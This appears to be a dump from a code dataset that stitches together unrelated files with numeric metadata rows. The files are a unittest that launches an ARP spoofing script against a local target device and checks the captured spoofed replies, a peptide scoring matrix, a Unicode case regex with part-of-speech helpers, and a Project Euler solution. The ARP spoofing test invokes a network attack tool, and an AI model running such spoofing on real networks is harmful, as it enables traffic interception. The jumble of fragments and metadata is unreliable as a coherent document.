__maintainer__ = 'Vladimir Ivanov'
__email__ = 'ivanov.vladimir.mail@gmail.com'
__status__ = 'Development'
# endregion
# region Main class - ScriptArpScanTest
class ScriptArpSpoofTest(unittest.TestCase):
# region Properties
root_path = dirname(dirname(dirname(dirname(dirname(dirname(abspath(__file__)))))))
path.append(root_path)
from raw_packet.Utils.base import Base
from raw_packet.Tests.Unit_tests.variables import Variables
base: Base = Base()
tshark_pcap_filename: str = '/tmp/arp_spoof_test.pcap'
# endregion
def test01_main_responses(self):
find_spoof_packet: bool = False
arp_spoof_command: str = 'python3 ' + self.root_path + '/Scripts/ARP/arp_spoof.py -i ' + \
ScriptArpSpoofTest.Variables.test_network_interface + ' -t ' + \
ScriptArpSpoofTest.Variables.apple_device_ipv4_address
Popen(arp_spoof_command, shell=True)
tshark_command: str = 'tshark -i ' + ScriptArpSpoofTest.Variables.test_network_interface + \
' -f "ether src ' + ScriptArpSpoofTest.Variables.your_mac_address + \
' and ether dst ' + ScriptArpSpoofTest.Variables.apple_device_mac_address + \
' and arp" -B 65535 -w ' + self.tshark_pcap_filename + \
' 1>/dev/null 2>&1'
Popen(tshark_command, shell=True)
sleep(5)
while self.base.get_process_pid('/arp_spoof.py') != -1:
kill(self.base.get_process_pid('/arp_spoof.py'), SIGTERM)
sleep(0.5)
while self.base.get_process_pid('tshark') != -1:
kill(self.base.get_process_pid('tshark'), SIGTERM)
sleep(0.5)
try:
packets = rdpcap(self.tshark_pcap_filename)
for packet in packets:
if packet.haslayer(ARP):
arp_packet = packet[ARP]
self.base.print_info('ARP opcode: ', str(arp_packet.op))
self.base.print_info('ARP sender MAC: ', arp_packet.hwsrc)
self.base.print_info('ARP target MAC: ', arp_packet.hwdst)
self.base.print_info('ARP sender IP: ', arp_packet.psrc)
self.base.print_info('ARP target IP: ', arp_packet.pdst)
if arp_packet.hwsrc == ScriptArpSpoofTest.Variables.your_mac_address and \
arp_packet.hwdst == ScriptArpSpoofTest.Variables.apple_device_mac_address and \
arp_packet.psrc == ScriptArpSpoofTest.Variables.router_ipv4_address and \
arp_packet.pdst == ScriptArpSpoofTest.Variables.apple_device_ipv4_address and \
arp_packet.op == 2:
find_spoof_packet = True
break
except ValueError:
pass
if isfile(self.tshark_pcap_filename):
remove(self.tshark_pcap_filename)
self.assertTrue(find_spoof_packet)
def test02_main_requests(self):
find_spoof_packet: bool = False
arp_spoof_command: str = 'python3 ' + self.root_path + '/Scripts/ARP/arp_spoof.py -i ' + \
ScriptArpSpoofTest.Variables.test_network_interface + ' -t ' + \
ScriptArpSpoofTest.Variables.apple_device_ipv4_address + ' -r'
Popen(arp_spoof_command, shell=True)
tshark_command: str = 'tshark -i ' + ScriptArpSpoofTest.Variables.test_network_interface + \
' -f "ether src ' + ScriptArpSpoofTest.Variables.your_mac_address + \
' and ether dst ' + ScriptArpSpoofTest.Variables.apple_device_mac_address + \
' and arp" -B 65535 -w ' + self.tshark_pcap_filename + \
' 1>/dev/null 2>&1'
Popen(tshark_command, shell=True)
sleep(5)
while self.base.get_process_pid('/arp_spoof.py') != -1:
kill(self.base.get_process_pid('/arp_spoof.py'), SIGTERM)
sleep(0.5)
while self.base.get_process_pid('tshark') != -1:
kill(self.base.get_process_pid('tshark'), SIGTERM)
sleep(0.5)
try:
packets = rdpcap(self.tshark_pcap_filename)
for packet in packets:
if packet.haslayer(ARP):
arp_packet = packet[ARP]
self.base.print_info('ARP opcode: ', str(arp_packet.op))
self.base.print_info('ARP sender MAC: ', arp_packet.hwsrc)
self.base.print_info('ARP target MAC: ', arp_packet.hwdst)
self.base.print_info('ARP sender IP: ', arp_packet.psrc)
self.base.print_info('ARP target IP: ', arp_packet.pdst)
if arp_packet.hwsrc == ScriptArpSpoofTest.Variables.your_mac_address and \
arp_packet.hwdst == '00:00:00:00:00:00' and \
arp_packet.psrc == ScriptArpSpoofTest.Variables.router_ipv4_address and \
arp_packet.op == 1:
find_spoof_packet = True
break
except ValueError:
pass
if isfile(self.tshark_pcap_filename):
remove(self.tshark_pcap_filename)
self.assertTrue(find_spoof_packet)
def test03_main_bad_interface(self):
arp_spoof = run(['python3 ' + self.root_path + '/Scripts/ARP/arp_spoof.py -i ' +
ScriptArpSpoofTest.Variables.bad_network_interface], shell=True, stdout=PIPE)
arp_spoof_output: str = arp_spoof.stdout.decode('utf-8')
print(arp_spoof_output)
self.assertIn(ScriptArpSpoofTest.Variables.bad_network_interface, arp_spoof_output)
def test04_main_bad_gateway_ip(self):
arp_spoof = run(['python3 ' + self.root_path + '/Scripts/ARP/arp_spoof.py -i ' +
ScriptArpSpoofTest.Variables.test_network_interface + ' -g ' +
ScriptArpSpoofTest.Variables.bad_ipv4_address], shell=True, stdout=PIPE)
arp_spoof_output: str = arp_spoof.stdout.decode('utf-8')
print(arp_spoof_output)
self.assertIn(ScriptArpSpoofTest.Variables.bad_ipv4_address, arp_spoof_output)
def test05_main_bad_target_ip(self):
arp_spoof = run(['python3 ' + self.root_path + '/Scripts/ARP/arp_spoof.py -i ' +
ScriptArpSpoofTest.Variables.test_network_interface + ' -t ' +
ScriptArpSpoofTest.Variables.bad_ipv4_address], shell=True, stdout=PIPE)
arp_spoof_output: str = arp_spoof.stdout.decode('utf-8')
print(arp_spoof_output)
self.assertIn(ScriptArpSpoofTest.Variables.bad_ipv4_address, arp_spoof_output)
def test06_main_bad_target_mac(self):
arp_spoof = run(['python3 ' + self.root_path + '/Scripts/ARP/arp_spoof.py -i ' +
ScriptArpSpoofTest.Variables.test_network_interface + ' -t ' +
ScriptArpSpoofTest.Variables.apple_device_ipv4_address + ' -m ' +
ScriptArpSpoofTest.Variables.bad_mac_address], shell=True, stdout=PIPE)
arp_spoof_output: str = arp_spoof.stdout.decode('utf-8')
print(arp_spoof_output)
self.assertIn(ScriptArpSpoofTest.Variables.bad_mac_address, arp_spoof_output)
# endregion
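The negative tests above (`test03`-`test06`) all follow one pattern: run the script through a shell, capture stdout, and assert that the bad value is reported back. A standalone sketch of that pattern, with `echo` standing in for the `arp_spoof.py` invocation (POSIX shell assumed):

```python
from subprocess import run, PIPE

# 'echo' substitutes for the real script; shell=True with a one-element list
# passes the string to /bin/sh -c, just like the tests above.
proc = run(['echo bad-interface'], shell=True, stdout=PIPE)
output = proc.stdout.decode('utf-8')
print('bad-interface' in output)  # -> True
```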
| 50.067901 | 107 | 0.617433 | 919 | 8,111 | 5.161045 | 0.166485 | 0.062408 | 0.0253 | 0.035842 | 0.801813 | 0.761754 | 0.74805 | 0.74805 | 0.73793 | 0.73793 | 0 | 0.015044 | 0.287018 | 8,111 | 161 | 108 | 50.378882 | 0.805118 | 0.03785 | 0 | 0.676692 | 0 | 0 | 0.103377 | 0.026198 | 0 | 0 | 0 | 0 | 0.045113 | 1 | 0.045113 | false | 0.015038 | 0.082707 | 0 | 0.157895 | 0.105263 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
cc1efc92565700f28a1e214f9336fcbf363f2ca3 | 2,259 | py | Python | epytope/Data/pssms/smm/mat/B_42_01_9.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 7 | 2021-02-01T18:11:28.000Z | 2022-01-31T19:14:07.000Z | epytope/Data/pssms/smm/mat/B_42_01_9.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 22 | 2021-01-02T15:25:23.000Z | 2022-03-14T11:32:53.000Z | epytope/Data/pssms/smm/mat/B_42_01_9.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 4 | 2021-05-28T08:50:38.000Z | 2022-03-14T11:45:32.000Z | B_42_01_9 = {0: {'A': 0.055, 'C': 0.0, 'E': -0.236, 'D': 0.334, 'G': 0.124, 'F': -0.444, 'I': 0.01, 'H': 0.243, 'K': 0.016, 'M': 0.0, 'L': -0.297, 'N': -0.122, 'Q': -0.004, 'P': 0.065, 'S': 0.158, 'R': 0.092, 'T': 0.185, 'W': 0.181, 'V': -0.162, 'Y': -0.198}, 1: {'A': 0.306, 'C': 0.0, 'E': 0.632, 'D': 0.05, 'G': 0.139, 'F': -0.603, 'I': -0.341, 'H': 0.125, 'K': 0.011, 'M': 0.0, 'L': 0.289, 'N': 0.0, 'Q': 0.357, 'P': -1.512, 'S': 0.402, 'R': 0.303, 'T': 0.058, 'W': 0.0, 'V': -0.031, 'Y': -0.186}, 2: {'A': 0.037, 'C': 0.0, 'E': 0.181, 'D': 0.094, 'G': 0.227, 'F': -0.015, 'I': 0.073, 'H': 0.054, 'K': -0.058, 'M': -0.29, 'L': 0.156, 'N': 0.043, 'Q': 0.041, 'P': -0.027, 'S': -0.116, 'R': -0.305, 'T': -0.039, 'W': -0.0, 'V': -0.042, 'Y': -0.014}, 3: {'A': 0.0, 'C': -0.045, 'E': 0.073, 'D': -0.094, 'G': 0.238, 'F': -0.078, 'I': -0.084, 'H': -0.018, 'K': 0.14, 'M': 0.0, 'L': 0.152, 'N': 0.04, 'Q': 0.075, 'P': 0.013, 'S': -0.037, 'R': -0.116, 'T': -0.192, 'W': -0.065, 'V': -0.104, 'Y': 0.102}, 4: {'A': -0.16, 'C': -0.017, 'E': 0.404, 'D': 0.253, 'G': 0.092, 'F': 0.089, 'I': -0.081, 'H': 0.0, 'K': 0.322, 'M': -0.331, 'L': -0.526, 'N': 0.356, 'Q': 0.26, 'P': -0.171, 'S': -0.295, 'R': 0.017, 'T': 0.148, 'W': -0.244, 'V': -0.17, 'Y': 0.054}, 5: {'A': -0.057, 'C': 0.0, 'E': 0.466, 'D': 0.323, 'G': 0.053, 'F': 0.164, 'I': 0.185, 'H': -0.201, 'K': -0.357, 'M': -0.027, 'L': 0.048, 'N': -0.024, 'Q': -0.073, 'P': -0.024, 'S': 0.118, 'R': -0.479, 'T': 0.153, 'W': 0.0, 'V': -0.349, 'Y': 0.082}, 6: {'A': -0.109, 'C': 0.103, 'E': -0.025, 'D': 0.477, 'G': -0.065, 'F': -0.301, 'I': -0.083, 'H': -0.065, 'K': -0.15, 'M': -0.113, 'L': 0.013, 'N': -0.003, 'Q': 0.282, 'P': -0.185, 'S': 0.136, 'R': -0.315, 'T': 0.267, 'W': 0.134, 'V': -0.104, 'Y': 0.107}, 7: {'A': -0.393, 'C': 0.009, 'E': -0.147, 'D': 0.107, 'G': -0.136, 'F': 0.0, 'I': -0.269, 'H': 0.104, 'K': 0.229, 'M': 0.238, 'L': 0.19, 'N': 0.196, 'Q': -0.087, 'P': -0.264, 'S': 
-0.253, 'R': 0.101, 'T': 0.304, 'W': -0.248, 'V': 0.381, 'Y': -0.062}, 8: {'A': -0.47, 'C': 0.0, 'E': 0.0, 'D': 0.0, 'G': 0.0, 'F': -0.464, 'I': -0.404, 'H': 0.0, 'K': 1.278, 'M': -1.578, 'L': -0.605, 'N': 0.0, 'Q': 0.0, 'P': 0.0, 'S': 0.0, 'R': 1.152, 'T': -0.166, 'W': 0.341, 'V': -0.21, 'Y': 1.126}, -1: {'con': 3.85875}} | 2,259 | 2,259 | 0.385126 | 557 | 2,259 | 1.556553 | 0.292639 | 0.053057 | 0.017301 | 0.023068 | 0.107266 | 0 | 0 | 0 | 0 | 0 | 0 | 0.362142 | 0.165117 | 2,259 | 1 | 2,259 | 2,259 | 0.097561 | 0 | 0 | 0 | 0 | 0 | 0.080973 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
cc21d22a0df477b9364223be687fc78b0c687565 | 6,794 | py | Python | install/freqdb/common.py | mzimandl/wag | f9309bb50d21731304354d69f2d9347dcdcbe7a8 | [
"Apache-2.0"
] | 3 | 2020-06-01T08:59:25.000Z | 2020-08-28T07:08:52.000Z | install/freqdb/common.py | czcorpus/wdglance | 817607b29136394a4641cf1abc303db66cff6500 | [
"Apache-2.0"
] | 129 | 2019-02-05T08:04:33.000Z | 2020-05-11T14:24:23.000Z | install/freqdb/common.py | czcorpus/wdglance | 817607b29136394a4641cf1abc303db66cff6500 | [
"Apache-2.0"
] | 2 | 2019-09-13T14:52:24.000Z | 2019-10-03T08:17:07.000Z | import re
upcase_regex = re.compile(u"^[A-Z\u00C0-\u00D6\u00D8-\u00DE\u0100\u0102\u0104\u0106\u0108\u010A\u010C\u010E\u0110\u0112\u0114\u0116\u0118\u011A\u011C\u011E\u0120\u0122\u0124\u0126\u0128\u012A\u012C\u012E\u0130\u0132\u0134\u0136\u0139\u013B\u013D\u013F\u0141\u0143\u0145\u0147\u014A\u014C\u014E\u0150\u0152\u0154\u0156\u0158\u015A\u015C\u015E\u0160\u0162\u0164\u0166\u0168\u016A\u016C\u016E\u0170\u0172\u0174\u0176\u0178\u0179\u017B\u017D\u0181\u0182\u0184\u0186\u0187\u0189-\u018B\u018E-\u0191\u0193\u0194\u0196-\u0198\u019C\u019D\u019F\u01A0\u01A2\u01A4\u01A6\u01A7\u01A9\u01AC\u01AE\u01AF\u01B1-\u01B3\u01B5\u01B7\u01B8\u01BC\u01C4\u01C7\u01CA\u01CD\u01CF\u01D1\u01D3\u01D5\u01D7\u01D9\u01DB\u01DE\u01E0\u01E2\u01E4\u01E6\u01E8\u01EA\u01EC\u01EE\u01F1\u01F4\u01F6-\u01F8\u01FA\u01FC\u01FE\u0200\u0202\u0204\u0206\u0208\u020A\u020C\u020E\u0210\u0212\u0214\u0216\u0218\u021A\u021C\u021E\u0220\u0222\u0224\u0226\u0228\u022A\u022C\u022E\u0230\u0232\u023A\u023B\u023D\u023E\u0241\u0243-\u0246\u0248\u024A\u024C\u024E\u0370\u0372\u0376\u037F\u0386\u0388-\u038A\u038C\u038E\u038F\u0391-\u03A1\u03A3-\u03AB\u03CF\u03D2-\u03D4\u03D8\u03DA\u03DC\u03DE\u03E0\u03E2\u03E4\u03E6\u03E8\u03EA\u03EC\u03EE\u03F4\u03F7\u03F9\u03FA\u03FD-\u042F\u0460\u0462\u0464\u0466\u0468\u046A\u046C\u046E\u0470\u0472\u0474\u0476\u0478\u047A\u047C\u047E\u0480\u048A\u048C\u048E\u0490\u0492\u0494\u0496\u0498\u049A\u049C\u049E\u04A0\u04A2\u04A4\u04A6\u04A8\u04AA\u04AC\u04AE\u04B0\u04B2\u04B4\u04B6\u04B8\u04BA\u04BC\u04BE\u04C0\u04C1\u04C3\u04C5\u04C7\u04C9\u04CB\u04CD\u04D0\u04D2\u04D4\u04D6\u04D8\u04DA\u04DC\u04DE\u04E0\u04E2\u04E4\u04E6\u04E8\u04EA\u04EC\u04EE\u04F0\u04F2\u04F4\u04F6\u04F8\u04FA\u04FC\u04FE\u0500\u0502\u0504\u0506\u0508\u050A\u050C\u050E\u0510\u0512\u0514\u0516\u0518\u051A\u051C\u051E\u0520\u0522\u0524\u0526\u0528\u052A\u052C\u052E\u0531-\u0556\u10A0-\u10C5\u10C7\u10CD\u13A0-\u13F5\u1E00\u1E02\u1E04\u1E06\u1E08\u1E0A\u1E0C\u1E0E\u1E10\u1E12\u1E14\u1E16\u1E18\u1E1A\u1E1C\u1E1E\u1E20\u1E22\u1E24\u1E26\
u1E28\u1E2A\u1E2C\u1E2E\u1E30\u1E32\u1E34\u1E36\u1E38\u1E3A\u1E3C\u1E3E\u1E40\u1E42\u1E44\u1E46\u1E48\u1E4A\u1E4C\u1E4E\u1E50\u1E52\u1E54\u1E56\u1E58\u1E5A\u1E5C\u1E5E\u1E60\u1E62\u1E64\u1E66\u1E68\u1E6A\u1E6C\u1E6E\u1E70\u1E72\u1E74\u1E76\u1E78\u1E7A\u1E7C\u1E7E\u1E80\u1E82\u1E84\u1E86\u1E88\u1E8A\u1E8C\u1E8E\u1E90\u1E92\u1E94\u1E9E\u1EA0\u1EA2\u1EA4\u1EA6\u1EA8\u1EAA\u1EAC\u1EAE\u1EB0\u1EB2\u1EB4\u1EB6\u1EB8\u1EBA\u1EBC\u1EBE\u1EC0\u1EC2\u1EC4\u1EC6\u1EC8\u1ECA\u1ECC\u1ECE\u1ED0\u1ED2\u1ED4\u1ED6\u1ED8\u1EDA\u1EDC\u1EDE\u1EE0\u1EE2\u1EE4\u1EE6\u1EE8\u1EEA\u1EEC\u1EEE\u1EF0\u1EF2\u1EF4\u1EF6\u1EF8\u1EFA\u1EFC\u1EFE\u1F08-\u1F0F\u1F18-\u1F1D\u1F28-\u1F2F\u1F38-\u1F3F\u1F48-\u1F4D\u1F59\u1F5B\u1F5D\u1F5F\u1F68-\u1F6F\u1FB8-\u1FBB\u1FC8-\u1FCB\u1FD8-\u1FDB\u1FE8-\u1FEC\u1FF8-\u1FFB\u2102\u2107\u210B-\u210D\u2110-\u2112\u2115\u2119-\u211D\u2124\u2126\u2128\u212A-\u212D\u2130-\u2133\u213E\u213F\u2145\u2160-\u216F\u2183\u24B6-\u24CF\u2C00-\u2C2E\u2C60\u2C62-\u2C64\u2C67\u2C69\u2C6B\u2C6D-\u2C70\u2C72\u2C75\u2C7E-\u2C80\u2C82\u2C84\u2C86\u2C88\u2C8A\u2C8C\u2C8E\u2C90\u2C92\u2C94\u2C96\u2C98\u2C9A\u2C9C\u2C9E\u2CA0\u2CA2\u2CA4\u2CA6\u2CA8\u2CAA\u2CAC\u2CAE\u2CB0\u2CB2\u2CB4\u2CB6\u2CB8\u2CBA\u2CBC\u2CBE\u2CC0\u2CC2\u2CC4\u2CC6\u2CC8\u2CCA\u2CCC\u2CCE\u2CD0\u2CD2\u2CD4\u2CD6\u2CD8\u2CDA\u2CDC\u2CDE\u2CE0\u2CE2\u2CEB\u2CED\u2CF2\uA640\uA642\uA644\uA646\uA648\uA64A\uA64C\uA64E\uA650\uA652\uA654\uA656\uA658\uA65A\uA65C\uA65E\uA660\uA662\uA664\uA666\uA668\uA66A\uA66C\uA680\uA682\uA684\uA686\uA688\uA68A\uA68C\uA68E\uA690\uA692\uA694\uA696\uA698\uA69A\uA722\uA724\uA726\uA728\uA72A\uA72C\uA72E\uA732\uA734\uA736\uA738\uA73A\uA73C\uA73E\uA740\uA742\uA744\uA746\uA748\uA74A\uA74C\uA74E\uA750\uA752\uA754\uA756\uA758\uA75A\uA75C\uA75E\uA760\uA762\uA764\uA766\uA768\uA76A\uA76C\uA76E\uA779\uA77B\uA77D\uA77E\uA780\uA782\uA784\uA786\uA78B\uA78D\uA790\uA792\uA796\uA798\uA79A\uA79C\uA79E\uA7A0\uA7A2\uA7A4\uA7A6\uA7A8\uA7AA-\uA7AE\uA7B0-\uA7B4\uA7B6\uFF21-\uFF3A\U00010400-\U00010427\U000104B0-
\U000104D3\U00010C80-\U00010CB2\U000118A0-\U000118BF\U0001D400-\U0001D419\U0001D434-\U0001D44D\U0001D468-\U0001D481\U0001D49C\U0001D49E\U0001D49F\U0001D4A2\U0001D4A5\U0001D4A6\U0001D4A9-\U0001D4AC\U0001D4AE-\U0001D4B5\U0001D4D0-\U0001D4E9\U0001D504\U0001D505\U0001D507-\U0001D50A\U0001D50D-\U0001D514\U0001D516-\U0001D51C\U0001D538\U0001D539\U0001D53B-\U0001D53E\U0001D540-\U0001D544\U0001D546\U0001D54A-\U0001D550\U0001D56C-\U0001D585\U0001D5A0-\U0001D5B9\U0001D5D4-\U0001D5ED\U0001D608-\U0001D621\U0001D63C-\U0001D655\U0001D670-\U0001D689\U0001D6A8-\U0001D6C0\U0001D6E2-\U0001D6FA\U0001D71C-\U0001D734\U0001D756-\U0001D76E\U0001D790-\U0001D7A8\U0001D7CA\U0001E900-\U0001E921\U0001F130-\U0001F149\U0001F150-\U0001F169\U0001F170-\U0001F189].+")
def is_tag(t):
    return re.match(r'[a-zA-Z$]', t)
def pos2pos(s): return s[0]
def penn2pos(s):
try:
return {
'CC': 'J', # Coordinating conjunction
'CD': 'C', # Cardinal number
'DT': 'X', # Determiner
'EX': 'X', # Existential there
'FW': 'X', # Foreign word
'IN': 'R', # Preposition or subordinating conjunction
'JJ': 'A', # Adjective
'JJR': 'A', # Adjective, comparative
'JJS': 'A', # Adjective, superlative
'LS': 'X', # List item marker
'MD': 'X', # Modal
'NN': 'N', # Noun, singular or mass
'NNS': 'N', # Noun, plural
'NNP': 'X', # Proper noun, singular
'NNPS': 'X', # Proper noun, plural
'PDT': 'X', # Predeterminer
'POS': 'X', # Possessive ending
'PRP': 'P', # Personal pronoun
'PRP$': 'P', # Possessive pronoun
'RB': 'D', # Adverb
'RBR': 'D', # Adverb, comparative
'RBS': 'D', # Adverb, superlative
'RP': 'T', # Particle
'SYM': 'X', # Symbol
'TO': 'X', # to
'UH': 'I', # Interjection
'VB': 'V', # Verb, base form
'VBD': 'V', # Verb, past tense
'VBG': 'V', # Verb, gerund or present participle
'VBN': 'V', # Verb, past participle
'VBP': 'V', # Verb, non-3rd person singular present
'VBZ': 'V', # Verb, 3rd person singular present
'WDT': 'V', # Wh-determiner
'WP': 'P', # Wh-pronoun
'WP$': 'P', # Possessive wh-pronoun
'WRB': 'D' # Wh-adverb
}[s]
except KeyError:
#print('Unrecognized tag {0}'.format(s))
return 'X'
def is_stop_word(w):
return w is None or re.match(r'^[\d\.,\:;\!\?%\$\[\]=\*\-\+\(\)\{\}/\|"\'_<>"&#@~\^§]+$', w)
def is_stop_ngram(w):
items = w.split(' ')
return any([is_stop_word(x) for x in items])
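As a quick sanity check of the helpers above, the tag mapping and stop-word patterns can be exercised standalone. This is an illustrative sketch, not the module itself: the mapping table here is deliberately truncated and the punctuation class is simplified.

```python
import re

# Truncated version of the Penn Treebank -> single-letter mapping above,
# for illustration only; the real table in common.py covers all tags.
PENN2POS = {'NN': 'N', 'NNS': 'N', 'JJ': 'A', 'VB': 'V', 'RB': 'D'}

def penn2pos(tag):
    # dict.get gives the same 'X' fallback as the try/except KeyError pattern
    return PENN2POS.get(tag, 'X')

def is_stop_word(w):
    # same idea as above: None, or a token made only of digits/punctuation
    return w is None or re.match(r'^[\d\.,\:;\!\?%\$\-\+\(\)]+$', w) is not None

print(penn2pos('NNS'))        # N
print(penn2pos('UNKNOWN'))    # X
print(is_stop_word('42.5'))   # True
print(is_stop_word('word'))   # False
```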
| 111.377049 | 4,744 | 0.712688 | 956 | 6,794 | 5.056485 | 0.883891 | 0.006206 | 0.00331 | 0.00993 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.378021 | 0.110686 | 6,794 | 60 | 4,745 | 113.233333 | 0.42188 | 0.103915 | 0 | 0 | 0 | 0.019231 | 0.809721 | 0.78608 | 0 | 0 | 0 | 0 | 0 | 1 | 0.096154 | false | 0 | 0.019231 | 0.057692 | 0.211538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0bdbc35a6b7c1a54cfcff26d6405a80bcf772b9f | 3,820 | py | Python | problem8.py | Yusufpek/project-euler-with-python-csharp-tr | 16bd0730e71882738a981b14a465172262e369f0 | [
"CC0-1.0"
] | 2 | 2021-05-01T01:13:41.000Z | 2021-06-28T18:21:17.000Z | problem8.py | Yusufpek/project-euler-with-python-csharp-tr | 16bd0730e71882738a981b14a465172262e369f0 | [
"CC0-1.0"
] | null | null | null | problem8.py | Yusufpek/project-euler-with-python-csharp-tr | 16bd0730e71882738a981b14a465172262e369f0 | [
"CC0-1.0"
] | 2 | 2021-03-12T21:44:35.000Z | 2021-06-18T06:27:23.000Z | """
Project Euler Problem 8
EN:The four adjacent digits in the 1000-digit number that have the greatest product are 9 × 9 × 8 × 9 = 5832.
73167176531330624919225119674426574742355349194934
96983520312774506326239578318016984801869478851843
85861560789112949495459501737958331952853208805511
12540698747158523863050715693290963295227443043557
66896648950445244523161731856403098711121722383113
62229893423380308135336276614282806444486645238749
30358907296290491560440772390713810515859307960866
70172427121883998797908792274921901699720888093776
65727333001053367881220235421809751254540594752243
52584907711670556013604839586446706324415722155397
53697817977846174064955149290862569321978468622482
83972241375657056057490261407972968652414535100474
82166370484403199890008895243450658541227588666881
16427171479924442928230863465674813919123162824586
17866458359124566529476545682848912883142607690042
24219022671055626321111109370544217506941658960408
07198403850962455444362981230987879927244284909188
84580156166097919133875499200524063689912560717606
05886116467109405077541002256983155200055935729725
71636269561882670428252483600823257530420752963450
Find the thirteen adjacent digits in the 1000-digit number that have the greatest product. What is the value of this product?
TUR: In the 1000-digit number, the product of the four adjacent digits with the greatest product is 9 x 9 x 8 x 9 = 5832.
Find the thirteen adjacent digits in this number that have the greatest product. What is the value of this product?
"""
# I copied the number below, but it still contains embedded newline characters
number ="""73167176531330624919225119674426574742355349194934
96983520312774506326239578318016984801869478851843
85861560789112949495459501737958331952853208805511
12540698747158523863050715693290963295227443043557
66896648950445244523161731856403098711121722383113
62229893423380308135336276614282806444486645238749
30358907296290491560440772390713810515859307960866
70172427121883998797908792274921901699720888093776
65727333001053367881220235421809751254540594752243
52584907711670556013604839586446706324415722155397
53697817977846174064955149290862569321978468622482
83972241375657056057490261407972968652414535100474
82166370484403199890008895243450658541227588666881
16427171479924442928230863465674813919123162824586
17866458359124566529476545682848912883142607690042
24219022671055626321111109370544217506941658960408
07198403850962455444362981230987879927244284909188
84580156166097919133875499200524063689912560717606
05886116467109405077541002256983155200055935729725
71636269561882670428252483600823257530420752963450"""
# strip the newline characters from the number
number = number.replace("\n","")
# we will split the digits into 13-digit windows and collect them in this list
digits_13_packs = []
# the window start shifts one position at a time; each window holds 13 digits
for start in range(len(number) - 12):
    digits_13_packs.append(number[start:start + 13])
# split each window into single characters, then convert them from string to integer
# i.e. [3, 2, 1] instead of "321"
digits_13_int = [list(pack) for pack in digits_13_packs]
# convert to integers
for pack_index, pack in enumerate(digits_13_int):
    for digit_index, digit in enumerate(pack):
        digits_13_int[pack_index][digit_index] = int(digit)
# we will append the product of the digits in each window to this list
product_list = []
# iterate over every window
for pack in digits_13_int:
    result = 1
    # iterate over every digit in the window
    for digit in pack:
        # multiply the digits together
        result = result * digit
    product_list.append(result)
# print the largest product
print(max(product_list))
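The sliding-window scan above can also be written compactly with `math.prod` (Python 3.8+); an alternative sketch, checked against the four-digit example from the problem statement:

```python
from math import prod

def max_window_product(digits: str, k: int) -> int:
    # the range end is len - k + 1 so the final window is included
    return max(prod(int(d) for d in digits[i:i + k])
               for i in range(len(digits) - k + 1))

# the worked example from the problem statement: 9 * 9 * 8 * 9 = 5832
print(max_window_product("9989", 4))  # 5832
```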
| 39.791667 | 126 | 0.850524 | 291 | 3,820 | 11.103093 | 0.47079 | 0.017332 | 0.013618 | 0.011761 | 0.666667 | 0.656144 | 0.656144 | 0.656144 | 0.656144 | 0.656144 | 0 | 0.612002 | 0.118848 | 3,820 | 96 | 127 | 39.791667 | 0.346999 | 0.536649 | 0 | 0 | 0 | 0 | 0.616174 | 0.6035 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.028571 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0bde8e55cd7e619f9b899b1d177cd79ffbc9ca47 | 38 | py | Python | django_grpc_bus/__init__.py | rameezarshad/django-grpc-framework | 6f9cea9828343b23c60656b561bca5d750fe6b5f | [
"Apache-2.0"
] | 2 | 2020-12-19T18:56:49.000Z | 2022-01-13T07:01:37.000Z | django_grpc_bus/__init__.py | rameezarshad/django-grpc-framework | 6f9cea9828343b23c60656b561bca5d750fe6b5f | [
"Apache-2.0"
] | null | null | null | django_grpc_bus/__init__.py | rameezarshad/django-grpc-framework | 6f9cea9828343b23c60656b561bca5d750fe6b5f | [
"Apache-2.0"
] | null | null | null | from .client.registry import registry
| 19 | 37 | 0.842105 | 5 | 38 | 6.4 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 38 | 1 | 38 | 38 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0bf85ba6f810558cbed2ab6f477cf7b1c27fc89d | 63 | py | Python | models/utils/__init__.py | JackPlayer/nhl-salary-prediction | a32d9bc1468e671f60b81076df69a47f3910ae6c | [
"MIT"
] | null | null | null | models/utils/__init__.py | JackPlayer/nhl-salary-prediction | a32d9bc1468e671f60b81076df69a47f3910ae6c | [
"MIT"
